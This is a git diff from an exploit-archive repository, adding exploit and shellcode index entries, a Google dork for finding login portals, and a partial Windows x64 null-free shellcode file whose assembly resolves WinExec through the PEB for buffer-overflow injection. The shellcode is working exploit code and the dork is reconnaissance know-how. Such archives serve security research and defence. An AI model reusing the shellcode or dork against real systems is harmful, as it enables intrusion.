6522,exploits/php/webapps/6522.txt,"AvailScript Article Script - 'view.php' SQL Injection",2008-09-21,"Hussin X",webapps,php,,2008-09-20,2016-12-21,1,OSVDB-51799;CVE-2008-6037,,,,,
7456,exploits/php/webapps/7456.txt,"AvailScript Article Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,webapps,php,,2008-12-13,,1,OSVDB-56861;CVE-2008-6900,,,,,
@ -17066,6 +17069,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
5089,exploits/php/webapps/5089.txt,"DomPHP 0.82 - 'index.php' Local File Inclusion",2008-02-09,Houssamix,webapps,php,,2008-02-08,,1,OSVDB-41555;CVE-2008-0745,,,,,
30865,exploits/php/webapps/30865.txt,"DomPHP 0.83 - Local Directory Traversal",2014-01-12,Houssamix,webapps,php,,2014-01-17,2014-01-17,0,OSVDB-102204;CVE-2014-10037,,,,,
30872,exploits/php/webapps/30872.txt,"DomPHP 0.83 - SQL Injection",2014-01-13,Houssamix,webapps,php,,2014-01-15,2014-01-15,1,OSVDB-102180;CVE-2014-10038,,,,,
51615,exploits/php/webapps/51615.txt,"Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-28,0,,,,,,
31085,exploits/php/webapps/31085.txt,"Doodle4Gift - Multiple Vulnerabilities",2014-01-20,Dr.NaNo,webapps,php,80,2014-01-20,2014-01-20,1,OSVDB-102482;OSVDB-102481;OSVDB-102321;OSVDB-102320,,,http://www.exploit-db.com/screenshots/idlt31500/doodle4gift.jpg,,
4536,exploits/php/webapps/4536.txt,"doop CMS 1.3.7 - Local File Inclusion",2007-10-15,vladii,webapps,php,,2007-10-14,2017-01-06,1,OSVDB-37864;CVE-2007-5465,,,,http://www.exploit-db.comdoop-1.3.7.zip,
7569,exploits/php/webapps/7569.txt,"doop CMS 1.4.0b - Cross-Site Request Forgery / Arbitrary File Upload",2008-12-24,x0r,webapps,php,,2008-12-23,,1,,,,,,
@ -20491,9 +20495,11 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
5508,exploits/php/webapps/5508.txt,"Jokes Site Script - 'jokes.php' SQL Injection",2008-04-27,ProgenTR,webapps,php,,2008-04-26,2016-11-24,1,OSVDB-44671;CVE-2008-2065,,,,,
15164,exploits/php/webapps/15164.txt,"JomSocial 1.8.8 - Arbitrary File Upload",2010-09-30,"Jeff Channell",webapps,php,,2010-09-30,2015-07-12,0,OSVDB-68600,,,,,
40530,exploits/php/webapps/40530.txt,"JonhCMS 4.5.1 - SQL Injection",2016-10-13,Besim,webapps,php,,2016-10-13,2016-10-13,0,,,,,,
51629,exploits/php/webapps/51629.txt,"Joomla HikaShop 4.7.4 - Reflected XSS",2023-07-28,CraCkEr,webapps,php,,2023-07-28,2023-07-28,0,,,,,,
49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,,2021-03-08,2021-03-08,0,CVE-2018-17254,,,,,
50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",2022-05-11,"Wolfgang Hotwagner",webapps,php,,2022-05-11,2022-05-11,0,,,,,,
49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,,2020-11-17,2020-12-07,0,,,,,,
51631,exploits/php/webapps/51631.txt,"Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS",2023-07-28,CraCkEr,webapps,php,,2023-07-28,2023-07-28,0,,,,,,
31857,exploits/php/webapps/31857.txt,"Joomla! / Mambo Component Artists - 'idgalery' SQL Injection",2008-05-28,Cr@zy_King,webapps,php,,2008-05-28,2014-02-24,1,,,,,,https://www.securityfocus.com/bid/29407/info
31529,exploits/php/webapps/31529.txt,"Joomla! / Mambo Component Cinema 1.0 - 'id' SQL Injection",2008-03-23,S@BUN,webapps,php,,2008-03-23,2014-02-10,1,,,,,,https://www.securityfocus.com/bid/28427/info
28437,exploits/php/webapps/28437.txt,"Joomla! / Mambo Component Comprofiler 1.0 - 'class.php' Remote File Inclusion",2006-08-26,Matdhule,webapps,php,,2006-08-26,2016-12-06,1,CVE-2006-4553;OSVDB-28241,,,,,https://www.securityfocus.com/bid/19725/info
@ -23530,6 +23536,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44646,exploits/php/webapps/44646.txt,"Monstra CMS < 3.0.4 - Cross-Site Scripting (2)",2018-05-18,"Berk Dusunur",webapps,php,,2018-05-18,2018-09-24,0,,,,,,
45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,,2018-08-07,2018-08-13,0,,,,,,
49806,exploits/php/webapps/49806.txt,"Montiorr 1.7.6m - Persistent Cross-Site Scripting",2021-04-27,"Ahmad Shakla",webapps,php,,2021-04-27,2021-11-01,0,,,,,,
51628,exploits/php/webapps/51628.txt,"mooDating 1.2 - Reflected Cross-site scripting (XSS)",2023-07-28,CraCkEr,webapps,php,,2023-07-28,2023-07-28,0,CVE-2023-3849;CVE-2023-3848;CVE-2023-3847;CVE-2023-3846;CVE-2023-3845;CVE-2023-3844;CVE-2023-3843,,,,,
24071,exploits/php/webapps/24071.txt,"Moodle 1.1/1.2 - Cross-Site Scripting",2004-04-30,"Bartek Nowotarski",webapps,php,,2004-04-30,2013-01-13,1,CVE-2004-1978;OSVDB-5747,,,,,https://www.securityfocus.com/bid/10251/info
3508,exploits/php/webapps/3508.txt,"Moodle 1.5.2 - 'moodledata' Remote Session Disclosure",2007-03-18,xSh,webapps,php,,2007-03-17,,1,OSVDB-43558;CVE-2007-1647,,,,,
29284,exploits/php/webapps/29284.txt,"Moodle 1.5/1.6 - '/mod/forum/discuss.php?navtail' Cross-Site Scripting",2006-12-14,"Jose Miguel Yanez Venegas",webapps,php,,2006-12-14,2013-10-29,1,CVE-2006-6625;OSVDB-35949,,,,,https://www.securityfocus.com/bid/21596/info
@ -24573,6 +24580,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44144,exploits/php/webapps/44144.txt,"October CMS < 1.0.431 - Cross-Site Scripting",2018-02-19,"Samrat Das",webapps,php,,2018-02-19,2018-02-19,0,CVE-2018-7198,,,,,
49045,exploits/php/webapps/49045.sh,"October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)",2020-11-13,"Sivanesh Ashok",webapps,php,,2020-11-13,2020-11-13,0,CVE-2020-5295,,,,,
44546,exploits/php/webapps/44546.txt,"October CMS User Plugin 1.4.5 - Persistent Cross-Site Scripting",2018-04-26,0xB9,webapps,php,,2018-04-26,2018-04-26,0,CVE-2018-10366,,,,,
51630,exploits/php/webapps/51630.txt,"October CMS v3.4.4 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-07-28,"Okan Kurtulus",webapps,php,,2023-07-28,2023-07-28,0,,,,,,
42978,exploits/php/webapps/42978.txt,"OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting",2017-10-12,"Ishaq Mohammed",webapps,php,,2017-10-13,2017-11-17,0,CVE-2017-15284,,,,,
43106,exploits/php/webapps/43106.txt,"OctoberCMS 1.0.426 (Build 426) - Cross-Site Request Forgery",2017-11-01,"Zain Sabahat",webapps,php,,2017-11-01,2017-11-01,0,CVE-2017-16244,,,,,
38129,exploits/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",webapps,php,,2015-09-10,2015-09-10,0,OSVDB-127456,,,,,
@ -25521,6 +25529,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload",2021-09-06,a-rey,webapps,php,,2021-09-06,2021-10-22,0,,,,,,
27634,exploits/php/webapps/27634.txt,"PatroNet CMS - 'index.php' Cross-Site Scripting",2006-04-12,Soothackers,webapps,php,,2006-04-12,2013-08-17,1,CVE-2006-1783;OSVDB-31440,,,,,https://www.securityfocus.com/bid/17495/info
44746,exploits/php/webapps/44746.txt,"PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting",2018-05-24,AkkuS,webapps,php,,2018-05-24,2018-05-24,0,,,,,,
51614,exploits/php/webapps/51614.txt,"PaulPrinting CMS - (Search Delivery) Cross Site Scripting",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-28,0,,,,,,
51618,exploits/php/webapps/51618.txt,"PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities",2023-07-20,Vulnerability-Lab,webapps,php,,2023-07-20,2023-07-20,0,,,,,,
44689,exploits/php/webapps/44689.txt,"PaulPrinting CMS Printing 1.0 - SQL Injection",2018-05-22,"Mehmet Onder",webapps,php,,2018-05-22,2018-05-22,0,,,,,,
42156,exploits/php/webapps/42156.txt,"PaulShop - SQL Injection",2017-06-10,Se0pHpHack3r,webapps,php,,2017-06-11,2017-06-11,0,,,,,,
@ -25615,6 +25624,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
13901,exploits/php/webapps/13901.txt,"PenPals - Authentication Bypass",2010-06-17,"L0rd CrusAd3r",webapps,php,,2010-06-16,,0,OSVDB-52214,,,,,
4551,exploits/php/webapps/4551.txt,"PeopleAggregator 1.2pre6-release-53 - Multiple Remote File Inclusions",2007-10-21,GoLd_M,webapps,php,,2007-10-20,,1,OSVDB-45501;CVE-2007-5631;OSVDB-45500;OSVDB-45499;OSVDB-45498;OSVDB-45497;OSVDB-45496;OSVDB-45495,,,,,
11938,exploits/php/webapps/11938.txt,"Pepsi CMS (Irmin cms) pepsi-0.6-BETA2 - Multiple Local File",2010-03-30,eidelweiss,webapps,php,,2010-03-29,,1,OSVDB-63348;CVE-2010-1309;CVE-2008-7254,,,,http://www.exploit-db.compepsi-0.6-BETA2.tar.bz2,
51627,exploits/php/webapps/51627.txt,"Perch v3.2 - Persistent Cross Site Scripting (XSS)",2023-07-28,"Dinesh Mohanty",webapps,php,,2023-07-28,2023-07-28,0,,,,,,
51620,exploits/php/webapps/51620.txt,"Perch v3.2 - Remote Code Execution (RCE)",2023-07-21,"Mirabbas Ağalarov",webapps,php,,2023-07-21,2023-07-21,0,,,,,,
51621,exploits/php/webapps/51621.txt,"Perch v3.2 - Stored XSS",2023-07-21,"Mirabbas Ağalarov",webapps,php,,2023-07-21,2023-07-21,0,,,,,,
43590,exploits/php/webapps/43590.txt,"PerfexCRM 1.9.7 - Arbitrary File Upload",2018-01-15,"Ahmad Mahfouz",webapps,php,,2018-01-15,2018-01-15,0,CVE-2017-17976,,,,,
@ -28779,6 +28789,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
5675,exploits/php/webapps/5675.txt,"RoomPHPlanning 1.5 - Multiple SQL Injections",2008-05-26,"Virangar Security",webapps,php,,2008-05-25,,1,OSVDB-53397;CVE-2008-6634,,,,,
8198,exploits/php/webapps/8198.pl,"RoomPHPlanning 1.6 - 'userform.php' Create Admin User",2009-03-10,"Jonathan Salwan",webapps,php,,2009-03-09,2016-12-02,1,,,,,http://www.exploit-db.comrp_1.6.zip,
8797,exploits/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",webapps,php,,2009-05-25,2016-12-02,1,OSVDB-62791;CVE-2009-4671;OSVDB-54772;CVE-2009-4670;OSVDB-54771;CVE-2009-4669;OSVDB-54770;OSVDB-54769,,,,http://www.exploit-db.comrp_1.6.zip,
51622,exploits/php/webapps/51622.txt,"RosarioSIS 10.8.4 - CSV Injection",2023-07-28,"Ranjeet Jaiswal",webapps,php,,2023-07-28,2023-07-28,0,CVE-2023-29918,,,,,
10793,exploits/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - 'admin' Local File Inclusion",2009-12-30,cr4wl3r,webapps,php,,2009-12-29,,1,OSVDB-61563;CVE-2009-4581,,,,,
11158,exploits/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Authentication Bypass",2010-01-16,cr4wl3r,webapps,php,,2010-01-15,,1,,,,,http://www.exploit-db.comRoseOnlineCMS_v3_b1.rar,
3548,exploits/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - 'op' Local File Inclusion",2007-03-23,GoLd_M,webapps,php,,2007-03-22,2016-09-30,1,OSVDB-38601;CVE-2007-1636,,,,http://www.exploit-db.comRoseOnlineCMS_v3_B1.rar,
@ -32637,6 +32648,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40771,exploits/php/webapps/40771.txt,"WordPress Plugin Answer My Question 1.3 - SQL Injection",2016-11-17,"Lenon Leite",webapps,php,,2016-11-17,2016-11-17,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-17-at-161058.png,http://www.exploit-db.comanswer-my-question.zip,
46618,exploits/php/webapps/46618.txt,"WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion (PoC)",2019-03-28,"Ali S. Ahmad",webapps,php,80,2019-03-28,2019-07-05,0,,"File Inclusion (LFI/RFI)",,,http://www.exploit-db.comgotmls.4.18.63.zip,
50107,exploits/php/webapps/50107.py,"WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal",2021-07-06,TheSmuggler,webapps,php,,2021-07-06,2021-10-29,0,,,,,http://www.exploit-db.comgotmls.4.20.59.zip,
51632,exploits/php/webapps/51632.py,"WordPress Plugin AN_Gradebook 5.0.1 - SQLi",2023-07-28,"Lukas Kinneberg",webapps,php,,2023-07-28,2023-07-28,0,CVE-2023-2636,,,,,
48204,exploits/php/webapps/48204.txt,"WordPress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection",2020-03-12,"Daniel Monzón",webapps,php,,2020-03-12,2020-03-12,0,CVE-2020-9372;CVE-2020-9371,,,,http://www.exploit-db.comappointment-booking-calendar.zip,
41568,exploits/php/webapps/41568.txt,"WordPress Plugin Apptha Slider Gallery 1.0 - Arbitrary File Download",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
41567,exploits/php/webapps/41567.txt,"WordPress Plugin Apptha Slider Gallery 1.0 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
@ -34526,8 +34538,10 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
5634,exploits/php/webapps/5634.html,"Zomplog 3.8.2 - 'newuser.php' Arbitrary Add Admin",2008-05-16,ArxWolf,webapps,php,,2008-05-15,,1,OSVDB-45513;CVE-2008-2349,,,,,
34476,exploits/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Cross-Site Scripting",2010-08-15,10n1z3d,webapps,php,,2010-08-15,2016-11-30,1,,,,,,
15329,exploits/php/webapps/15329.txt,"Zomplog 3.9 - Cross-Site Request Forgery",2010-10-27,"High-Tech Bridge SA",webapps,php,,2010-10-27,2010-10-28,1,OSVDB-67213,,,,,http://www.htbridge.ch/advisory/xsrf_csrf_in_zomplog.html
51625,exploits/php/webapps/51625.txt,"Zomplog 3.9 - Cross-site scripting (XSS)",2023-07-28,"Mirabbas Ağalarov",webapps,php,,2023-07-28,2023-07-28,0,,,,,,
14650,exploits/php/webapps/14650.html,"Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-15,10n1z3d,webapps,php,,2010-08-15,2016-11-30,1,OSVDB-67225;OSVDB-67224;OSVDB-67223;OSVDB-67222;OSVDB-67221;OSVDB-67220;OSVDB-67219;OSVDB-67218;OSVDB-67217;OSVDB-67216;OSVDB-67215;OSVDB-67214;OSVDB-67213,,,,,
15331,exploits/php/webapps/15331.txt,"Zomplog 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-10-27,"High-Tech Bridge SA",webapps,php,,2010-10-27,2010-10-28,1,,,,,,http://www.htbridge.ch/advisory/xsrf_csrf_in_zomplog.html
51624,exploits/php/webapps/51624.py,"zomplog 3.9 - Remote Code Execution (RCE)",2023-07-28,"Mirabbas Ağalarov",webapps,php,,2023-07-28,2023-07-28,0,,,,,,
17593,exploits/php/webapps/17593.txt,"ZoneMinder 1.24.3 - Remote File Inclusion",2011-08-01,iye,webapps,php,,2011-08-01,2013-12-09,0,OSVDB-74198;CVE-2013-0332,,,,,
41239,exploits/php/webapps/41239.txt,"Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery",2017-02-03,"Tim Herres",webapps,php,80,2017-02-03,2017-02-03,0,,,,,http://www.exploit-db.comZoneMinder-1.30.0.tar.gz,https://www.foxmole.com/advisories/foxmole-2016-07-05.txt
47060,exploits/php/webapps/47060.txt,"ZoneMinder 1.32.3 - Cross-Site Scripting",2019-07-01,"Joey Lane",webapps,php,,2019-07-01,2019-07-03,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comzoneminder-1.32.3.tar.gz,
@ -34596,6 +34610,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48929,exploits/python/webapps/48929.py,"Ajenti 2.1.36 - Remote Code Execution (Authenticated)",2020-10-23,"Ahmet Ümit BAYRAM",webapps,python,,2020-10-23,2020-10-23,0,,,,,,
51040,exploits/python/webapps/51040.txt,"Bitbucket v7.0.0 - RCE",2023-03-23,khal4n1,webapps,python,,2023-03-23,2023-03-23,0,CVE-2022-36804,,,,,
43021,exploits/python/webapps/43021.py,"Check_MK 1.2.8p25 - Information Disclosure",2017-10-18,"Julien Ahrens",webapps,python,,2017-10-20,2017-10-20,0,CVE-2017-14955,,,,http://www.exploit-db.comcheck-mk-enterprise-1.2.8p25.demo_0.stretch_amd64.deb,
51636,exploits/python/webapps/51636.txt,"copyparty 1.8.2 - Directory Traversal",2023-07-28,"Vartamtezidis Theodoros",webapps,python,,2023-07-28,2023-07-28,1,,,,,,
51635,exploits/python/webapps/51635.txt,"copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)",2023-07-28,"Vartamtezidis Theodoros",webapps,python,,2023-07-28,2023-07-28,1,CVE-2023-38501,,,,,
51030,exploits/python/webapps/51030.txt,"CVAT 2.0 - Server Side Request Forgery",2022-11-11,"Emir Polat",webapps,python,,2022-11-11,2022-11-18,0,CVE-2022-31188,,,,,
47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,,2020-01-06,2020-04-13,1,CVE-2019-19844,,,,,https://ryu22e.org/en/posts/2019/12/25/django-cve-2019-19844/
40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80,2016-07-20,2016-07-20,1,CVE-2016-6186,,,,http://www.exploit-db.comdjango-1.10b1.tar.gz,https://www.vulnerability-lab.com/get_content.php?id=1869
@ -40062,6 +40078,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8637,exploits/windows/local/8637.pl,"GrabIt 1.7.2x - NZB DTD Reference Buffer Overflow",2009-05-07,"Jeremy Brown",local,windows,,2009-05-06,,1,CVE-2009-1586;OSVDB-54205,,,,,
51223,exploits/windows/local/51223.py,"Grand Theft Auto III/Vice City Skin File v1.1 - Buffer Overflow",2023-04-03,Knursoft,local,windows,,2023-04-03,2023-04-03,0,,,,,,
40538,exploits/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",local,windows,,2016-10-17,2016-10-19,1,,,,,http://www.exploit-db.comgraylog-collector-0.4.2.zip,
51633,exploits/windows/local/51633.ps1,"GreenShot 1.2.10 - Insecure Deserialization Arbitrary Code Execution",2023-07-28,p4r4bellum,local,windows,,2023-07-28,2023-07-28,0,CVE-2023-34634,,,,,
18748,exploits/windows/local/18748.rb,"GSM SIM Editor 5.15 - Local Buffer Overflow (Metasploit)",2012-04-18,Metasploit,local,windows,,2012-04-18,2012-04-18,1,OSVDB-81161,"Metasploit Framework (MSF)",,,,
14098,exploits/windows/local/14098.py,"GSM SIM Utility 5.15 - '.sms' File Local Buffer Overflow (SEH)",2010-06-28,chap0,local,windows,,2010-06-28,2010-07-03,1,,,,http://www.exploit-db.com/screenshots/idlt14500/14098.png,http://www.exploit-db.commultisim515.zip,http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054
14258,exploits/windows/local/14258.py,"GSM SIM Utility 5.15 - Direct RET Overflow",2010-07-07,chap0,local,windows,,2010-07-07,2017-08-17,1,OSVDB-81161,,,,http://www.exploit-db.commultisim515.zip,http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054
@ -40905,6 +40922,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
18954,exploits/windows/local/18954.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (Metasploit)",2012-05-30,Metasploit,local,windows,,2012-05-30,2012-05-30,1,OSVDB-74604;CVE-2011-3625,"Metasploit Framework (MSF)",,,,http://labs.mwrinfosecurity.com/files/Advisories/mwri_mplayer-sami-subtitles_2011-08-12.pdf
17565,exploits/windows/local/17565.pl,"MPlayer Lite r33064 - '.m3u' Local Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 & h1ch4m",local,windows,,2011-07-24,2011-07-29,1,,,,http://www.exploit-db.com/screenshots/idlt18000/17565.png,http://www.exploit-db.commplayer_lite_r33064.7z,
17013,exploits/windows/local/17013.pl,"MPlayer Lite r33064 - '.m3u' Local Overflow (SEH)",2011-03-20,"C4SS!0 & h1ch4m",local,windows,,2011-03-20,2011-03-20,1,OSVDB-104565,,,http://www.exploit-db.com/screenshots/idlt17500/screen-shot-2011-03-20-at-22830-pm.png,http://www.exploit-db.commplayer_lite_r33064.7z,
51637,exploits/windows/local/51637.txt,"mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory",2023-07-28,"Maximilian Barz",local,windows,,2023-07-28,2023-07-28,0,"CVE-cve : 2023-30367",,,,,
40426,exploits/windows/local/40426.txt,"MSI - 'NTIOLib.sys' / 'WinIO.sys' Local Privilege Escalation",2016-09-26,ReWolf,local,windows,,2016-09-26,2017-04-15,0,,,,,,
48836,exploits/windows/local/48836.c,"MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation",2020-09-28,"Matteo Malvica",local,windows,,2020-09-28,2020-09-28,0,CVE-2020-17382,,,,,
48079,exploits/windows/local/48079.txt,"MSI Packages Symbolic Links Processing - Windows 10 Privilege Escalation",2020-02-17,nu11secur1ty,local,windows,,2020-02-17,2020-02-17,0,CVE-2020-0683,,,,http://www.exploit-db.comCVE-2020-0683.zip,

Can't render this file because it is too large.

1
files_shellcodes.csv
View file

@ -931,6 +931,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
14052,shellcodes/windows/14052.c,"Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,,windows,195,2010-06-25,2018-01-09,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-662.php
15136,shellcodes/windows/15136.cpp,"Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode",2010-09-27,"Celil Ünüver",,windows,,2010-09-27,2010-11-06,1,,,,,,
51390,shellcodes/windows/51390.asm,"Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode",2023-04-25,Nayani,,windows,,2023-04-25,2023-04-25,0,,,,,,
51634,shellcodes/windows/51634.py,"Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)",2023-07-28,Senzee,,windows,169,2023-07-28,2023-07-28,0,,,,,,
13525,shellcodes/windows_x86/13525.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes)",2005-07-26,loco,,windows_x86,29,2005-07-25,,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-388.php
13526,shellcodes/windows_x86/13526.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)",2005-01-26,twoci,,windows_x86,31,2005-01-25,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-387.php
13527,shellcodes/windows_x86/13527.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes)",2005-01-09,oc192,,windows_x86,35,2005-01-08,2018-01-21,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-260.php

1 id file description date_published author type platform size date_added date_updated verified codes tags aliases screenshot_url application_url source_url
931 14052 shellcodes/windows/14052.c Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes) 2010-06-25 RubberDuck windows 195 2010-06-25 2018-01-09 1 http://shell-storm.org/shellcode/files/shellcode-662.php
932 15136 shellcodes/windows/15136.cpp Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode 2010-09-27 Celil Ünüver windows 2010-09-27 2010-11-06 1
933 51390 shellcodes/windows/51390.asm Windows/x64 - Delete File shellcode / Dynamic PEB method null-free Shellcode 2023-04-25 Nayani windows 2023-04-25 2023-04-25 0
934 51634 shellcodes/windows/51634.py Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes) 2023-07-28 Senzee windows 169 2023-07-28 2023-07-28 0
935 13525 shellcodes/windows_x86/13525.c Windows (9x/NT/2000/XP) - PEB Method Shellcode (29 bytes) 2005-07-26 loco windows_x86 29 2005-07-25 1 http://shell-storm.org/shellcode/files/shellcode-388.php
936 13526 shellcodes/windows_x86/13526.c Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes) 2005-01-26 twoci windows_x86 31 2005-01-25 2018-01-21 1 http://shell-storm.org/shellcode/files/shellcode-387.php
937 13527 shellcodes/windows_x86/13527.c Windows (9x/NT/2000/XP) - PEB Method Shellcode (35 bytes) 2005-01-09 oc192 windows_x86 35 2005-01-08 2018-01-21 1 http://shell-storm.org/shellcode/files/shellcode-260.php

15
ghdb.xml
View file

@ -87828,6 +87828,21 @@ Buenos Aires - Argentina
<date>2021-02-16</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>8219</id>
<link>https://www.exploit-db.com/ghdb/8219</link>
<category>Pages Containing Login Portals</category>
<shortDescription>inurl:uux.aspx</shortDescription>
<textualDescription># Google Dork: inurl:uux.aspx
# Pages Containing Login Portals
# Date: 28/07/2023
# Exploit Author: Javier Bernardo</textualDescription>
<query>inurl:uux.aspx</query>
<querystring>https://www.google.com/search?q=inurl:uux.aspx</querystring>
<edb></edb>
<date>2023-07-28</date>
<author>Javier Bernardo</author>
</entry>
<entry>
<id>6562</id>
<link>https://www.exploit-db.com/ghdb/6562</link>

128
shellcodes/windows/51634.py Executable file
View file

@ -0,0 +1,128 @@
import ctypes, struct
from keystone import *
# Shellcode Author: Senzee
# Shellcode Title: Windows/x64 - PIC Null-Free Calc.exe Shellcode (169 Bytes)
# Date: 07/26/2023
# Platform: Windows x64
# Tested on: Windows 11 Home/Windows Server 2022 Standard/Windows Server 2019 Datacenter
# OS Version (respectively): 10.0.22621 /10.0.20348 /10.0.17763
# Shellcode size: 169 bytes
# Shellcode Desciption: Windows x64 shellcode that dynamically resolves the base address of kernel32.dll via PEB and ExportTable method.
# Contains no Null bytes (0x00), and therefor will not crash if injected into typical stack Buffer OverFlow vulnerabilities.
CODE = (
"find_kernel32:"
" xor rdx, rdx;"
" mov rax, gs:[rdx+0x60];" # RAX stores the value of ProcessEnvironmentBlock member in TEB, which is the PEB address
" mov rsi,[rax+0x18];" # Get the value of the LDR member in PEB, which is the address of the _PEB_LDR_DATA structure
" mov rsi,[rsi + 0x20];" # RSI is the address of the InMemoryOrderModuleList member in the _PEB_LDR_DATA structure
" mov r9, [rsi];" # Current module is python.exe
" mov r9, [r9];" # Current module is ntdll.dll
" mov r9, [r9+0x20];" # Current module is kernel32.dll
" jmp call_winexec;"
"parse_module:" # Parsing DLL file in memory
" mov ecx, dword ptr [r9 + 0x3c];" # R9 stores the base address of the module, get the NT header offset
" xor r15, r15;"
" mov r15b, 0x88;" # Offset to Export Directory
" add r15, r9;"
" add r15, rcx;"
" mov r15d, dword ptr [r15];" # Get the RVA of the export directory
" add r15, r9;" # R14 stores the VMA of the export directory
" mov ecx, dword ptr [r15 + 0x18];" # ECX stores the number of function names as an index value
" mov r14d, dword ptr [r15 + 0x20];" # Get the RVA of ENPT
" add r14, r9;" # R14 stores the VMA of ENPT
"search_function:" # Search for a given function
" jrcxz not_found;" # If RCX is 0, the given function is not found
" dec ecx;" # Decrease index by 1
" xor rsi, rsi;"
" mov esi, [r14 + rcx*4];" # RVA of function name string
" add rsi, r9;" # RSI points to function name string
"function_hashing:" # Hash function name function
" xor rax, rax;"
" xor rdx, rdx;"
" cld;" # Clear DF flag
"iteration:" # Iterate over each byte
" lodsb;" # Copy the next byte of RSI to Al
" test al, al;" # If reaching the end of the string
" jz compare_hash;" # Compare hash
" ror edx, 0x0d;" # Part of hash algorithm
" add edx, eax;" # Part of hash algorithm
" jmp iteration;" # Next byte
"compare_hash:" # Compare hash
" cmp edx, r8d;"
" jnz search_function;" # If not equal, search the previous function (index decreases)
" mov r10d, [r15 + 0x24];" # Ordinal table RVA
" add r10, r9;" # Ordinal table VMA
" movzx ecx, word ptr [r10 + 2*rcx];" # Ordinal value -1
" mov r11d, [r15 + 0x1c];" # RVA of EAT
" add r11, r9;" # VMA of EAT
" mov eax, [r11 + 4*rcx];" # RAX stores RVA of the function
" add rax, r9;" # RAX stores VMA of the function
" ret;"
"not_found:"
" ret;"
"call_winexec:"
" mov r8d, 0xe8afe98;" # WinExec Hash
" call parse_module;" # Search and obtain address of WinExec
" xor rcx, rcx;"
" push rcx;" # \0
